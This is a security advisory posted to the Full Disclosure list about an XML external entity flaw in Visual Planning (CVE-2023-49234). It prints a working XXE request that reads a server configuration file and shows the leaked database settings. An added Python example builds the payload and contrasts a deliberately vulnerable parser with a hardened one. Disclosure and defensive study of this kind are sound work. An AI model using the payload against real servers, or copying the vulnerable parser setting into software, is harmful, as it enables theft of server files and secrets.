-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Title
=====

SCHUTZWERK-SA-2023-006: Arbitrary File Read via XML External Entities in Visual Planning
Status
======

PUBLISHED

Version
=======

1.0

CVE reference
=============

CVE-2023-49234

Link
====

https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-006/

Text-only version:
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-006.txt

Affected products/vendor
========================

All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.

Summary
=======

Authenticated attackers can exploit a weakness in the XML parser functionality of the Visual Planning[0] application in order to obtain read access to arbitrary files on the application server. Depending on configured access permissions, this vulnerability could be used by an attacker to exfiltrate secrets stored on the local file system.
Risk
====

An attacker can use the vulnerability to gather information about the server and, depending on the stored data, exfiltrate secrets from the file system. Furthermore, HTTP requests issued by the parser while resolving external entities can be used for out-of-band exfiltration and possibly for server-side request forgery (SSRF) attacks.
Description
===========

During a recent red teaming assessment, Visual Planning was identified as part of the customer's internet-facing assets. The software is developed by STILOG I.S.T. and provides resource management and scheduling features. A security assessment conducted by SCHUTZWERK found an arbitrary file read vulnerability via XML external entities in Visual Planning.

The Admin Center application (vpadmin) communicates with the server through an XML-based protocol that uses proprietary compression and is transmitted over HTTP. As part of the assessment, SCHUTZWERK implemented a custom proxy in order to intercept and manipulate the messages exchanged between the application and the server.
One of the messages sent by the Admin Center application after authentication is the following:
<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.parameters.GetApplicationProperty>
  <defaultValue> </defaultValue>
  <propertyName>PWD</propertyName>
  <rawResult>false</rawResult>
  <section>INSTALLDATA</section>
  <userSession isNull="true"/>
</com.visualplanning.query.parameters.GetApplicationProperty>

The method GetApplicationProperty is called to request the value of the property PWD. The server responds with an XML message whose value element contains the result of the query:
<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.result.ApplicationPropertyResult>
  <resultValues/>
  <status>OK</status>
  <value> </value>
</com.visualplanning.query.result.ApplicationPropertyResult>

It was observed that if the requested property cannot be resolved, the content of the request's defaultValue element is reflected in the value element of the response. This makes defaultValue a suitable back channel for XML external entity (XXE) injection: whatever the server-side parser expands inside that element is returned to the client.
The following message was sent to the Visual Planning application. It declares an external entity pointing at a file on the server and references that entity from defaultValue, while asking for a property that does not resolve, so that the default value is reflected:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "C:\xampp2\tomcat\webapps\vplanning\configuration\install.properties"> ]>
<com.visualplanning.query.parameters.GetApplicationProperty>
  <defaultValue>&example;</defaultValue>
  <propertyName>ShowBackground</propertyName>
  <rawResult>false</rawResult>
  <section>Application</section>
  <userSession isNull="true"/>
</com.visualplanning.query.parameters.GetApplicationProperty>

The server responds with the content of the requested install.properties file inside the value element, thus confirming that the XML parser is vulnerable to XML external entity (XXE) injection:
<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.result.ApplicationPropertyResult>
  <resultValues/>
  <status>OK</status>
  <value>#
#Tue Oct 03 15:37:33 CEST 2023
INSTALLDATA.INSTALLSERIAL=
INSTALLDATA.INSTALLURL=http\://127.0.0.1\:8080/vplanning
INSTALLDATA.OK=Next
INSTALLDATA.PAGE=PROVIDER
INSTALLDATA.POOLMODE=1
INSTALLDATA.PORT=3306
INSTALLDATA.PROVIDERTYPE=MySQL
INSTALLDATA.PWD=ENCODE\:
INSTALLDATA.SERVER=127.0.0.1
INSTALLDATA.SERVERLANG=de
INSTALLDATA.USER=root
INSTALLDATA.VIEWERSERIAL=
</value>
</com.visualplanning.query.result.ApplicationPropertyResult>

The leaked file holds the database connection settings of the installation (provider type, host, port and user name). Further testing showed that out-of-band exfiltration via HTTPS requests is also generally possible.
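To make the mechanism concrete, the following script is an added example (not code from the advisory, from SCHUTZWERK or from STILOG) that rebuilds the exchange above with Python's xml.sax parser. A parser configured to resolve external general entities (feature_external_ges) expands the SYSTEM entity placed in defaultValue and thereby reads a file from disk, exactly the behaviour the reflected value element revealed; a hardened parser keeps that feature off and additionally rejects any DOCTYPE, so a payload can never declare an entity in the first place. The install.properties content, the temporary file path and the helper names (build_request, xxe_request, parse_vulnerable, parse_hardened, hardened_rejects) are constructed for this example; only the element layout is taken from the messages quoted above.

```python
"""Reflected XXE through a GetApplicationProperty-style message.

Added example: a parser that resolves external general entities leaks a
local file into the reflected defaultValue element; a hardened parser
refuses the DOCTYPE up front. The message layout follows the advisory,
the properties file content is constructed and not from a real install.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             property_lexical_handler)

# Constructed stand-in for install.properties (illustrative values only).
SAMPLE_PROPERTIES = (
    "#Tue Oct 03 15:37:33 CEST 2023\n"
    "INSTALLDATA.PROVIDERTYPE=MySQL\n"
    "INSTALLDATA.SERVER=127.0.0.1\n"
    "INSTALLDATA.USER=root\n"
    "INSTALLDATA.PWD=ENCODE\\:\n"
)


def write_sample_properties() -> str:
    """Write the constructed properties file to a temp path and return the path."""
    fd, path = tempfile.mkstemp(suffix=".properties")
    with os.fdopen(fd, "w", newline="\n") as fh:
        fh.write(SAMPLE_PROPERTIES)
    return path


def build_request(default_value: str, doctype: str = "") -> bytes:
    """Build a GetApplicationProperty message with the element layout from the advisory."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        + doctype
        + "<com.visualplanning.query.parameters.GetApplicationProperty>"
        + "<defaultValue>" + default_value + "</defaultValue>"
        + "<propertyName>ShowBackground</propertyName>"
        + "<rawResult>false</rawResult>"
        + "<section>Application</section>"
        + '<userSession isNull="true"/>'
        + "</com.visualplanning.query.parameters.GetApplicationProperty>"
    ).encode("utf-8")


def xxe_request(path: str) -> bytes:
    """Attacker message: a SYSTEM entity pointing at a server-local file,
    referenced from defaultValue so the server reflects the file content back."""
    doctype = '<!DOCTYPE foo [<!ENTITY example SYSTEM "%s">]>' % path
    return build_request("&example;", doctype)


class DefaultValueCollector(ContentHandler):
    """Collects the text of <defaultValue>, i.e. what the server would reflect."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._inside = False

    def startElement(self, name, attrs):
        if name == "defaultValue":
            self._inside = True

    def endElement(self, name):
        if name == "defaultValue":
            self._inside = False

    def characters(self, content):
        if self._inside:
            self.parts.append(content)


class RejectDoctype:
    """Lexical handler that aborts parsing on any DOCTYPE, so no entity can be declared."""

    def startDTD(self, name, public_id, system_id):
        raise xml.sax.SAXException("DOCTYPE declarations are not accepted")

    def endDTD(self):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def comment(self, content):
        pass


def parse_vulnerable(message: bytes) -> str:
    """Weak configuration: external general entities are fetched and expanded."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)   # SYSTEM entities read files/URLs
    collector = DefaultValueCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(message))
    return "".join(collector.parts)


def parse_hardened(message: bytes) -> str:
    """Fixed configuration: no external entities and no DOCTYPE at all."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setProperty(property_lexical_handler, RejectDoctype())
    collector = DefaultValueCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(message))
    return "".join(collector.parts)


def hardened_rejects(message: bytes) -> bool:
    """True if the hardened parser refuses the message instead of parsing it."""
    try:
        parse_hardened(message)
    except xml.sax.SAXException:
        return True
    return False


if __name__ == "__main__":
    path = write_sample_properties()
    print("vulnerable parser reflects:\n" + parse_vulnerable(xxe_request(path)))
    print("hardened parser rejects payload:", hardened_rejects(xxe_request(path)))
    print("benign request still parses:", repr(parse_hardened(build_request(" "))))
    os.unlink(path)
```

Rejecting the DOCTYPE outright, rather than only disabling external entities, also shuts the door on internal-entity expansion attacks and on parameter-entity tricks that would otherwise still reach the parser; a protocol like the one above never needs a DTD, so the strict setting costs nothing.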
Solution/Mitigation
===================

The vendor recommends updating to Visual Planning 8 (Build 240207).

Disclosure timeline
===================

2023-11-01: Vulnerability discovered
2023-11-09: Contacted vendor in order to determine security contact
2023-11-10: Received generic sales response from vendor
2023-11-14: Contacted CTO of vendor directly
2023-11-16: Vulnerabilities demonstrated in call with contact at vendor
2023-11-24: CVE assigned by MITRE
2023-11-24: Additional technical details provided to vendor
2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings is in progress
2024-01-30: Inquired about mitigation status regarding the reported vulnerabilities
2024-01-30: Vendor informed SCHUTZWERK that some of the issues were already fixed
2024-03-08: Sent advisory drafts to vendor
2024-03-28: Received patch information and release of advisory

Contact/Credits
===============

The vulnerability was discovered during an assessment by Lennert Preuth and David Brown of SCHUTZWERK GmbH.
References
==========

[0] https://www.visual-planning.com/en/

Disclaimer
==========

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The most recent version of this security advisory can be found on SCHUTZWERK GmbH's website (https://www.schutzwerk.com).
Additional information
======================

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/
SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/

-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0bcaHGFkdmlzb3Jp
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrsdwA/+MyfbZTe36+AYi9q6GJE6
S75Xm2aZtEM3NC5F6aMcELqFEW7LNjERmBoqfkHe+SWfgFxeCXl/XelHaNnR7HTM
ZZPCGwJmOI+XaraInPVdCDw1QVIdiCG4VZzE0tlnFbLBgM+OTOxcDOoG7OhzP6mm
ALfankzxu3AfbZhwebQtSXIQ+YqjitTsvjQGPleylqYK5CJbChsyvmMjomu/GzdO
sWQ25ODCVUy6VORet8yn5OkQnM2CjSkteuTdNxCzd6JUB+vQ0g5FCE5NVzkqYq21
YJ4Fc3PgkyAnrGefSbueL+Z/K6btM8RysJAwGahIEOdlkG8W/p09L0QQUGERT2VN
UO6oTi/1OyoJBV9L5umr6aHss3P92ln90UAUW2dlZOdGSB8rlXisxLC1wtFZAXH9
YwiGY/ACXmV1FtQQpgFxfNRyEWaltU5S0Y0bPAaW+ABSMLlK4X0Ft9E/4s4Yel2d
TGngEnVKcR/PKNtrJbBqPDwt98R0MdQi0QxBRaxGxAg4Yr1qex8ph6IRT7bDTm0/
1CKlQL7y9uvXlnFE4CO3IkKNp0ejKn3A7QEep4jit07VItIc+sRsoMnB6v54DoML
ZfIisDoijb3doTNieyMpgTGZTDWLwLO36IS9JiqafNCAnngExqylFX6vYQVggtRz
mZ2yA2/9ZfQwOawEirQtQr8=
=TUGM
-----END PGP SIGNATURE-----

-- 
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany
Zertifiziert / Certified ISO 27001, 9001 and TISAX
Phone +49 731 977 191 0
advisories () schutzwerk com / www.schutzwerk.com
Geschäftsführer / Managing Directors: Jakob Pietzka, Michael Schäfer
Amtsgericht Ulm / HRB 727391
Datenschutz / Data Protection www.schutzwerk.com/datenschutz
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/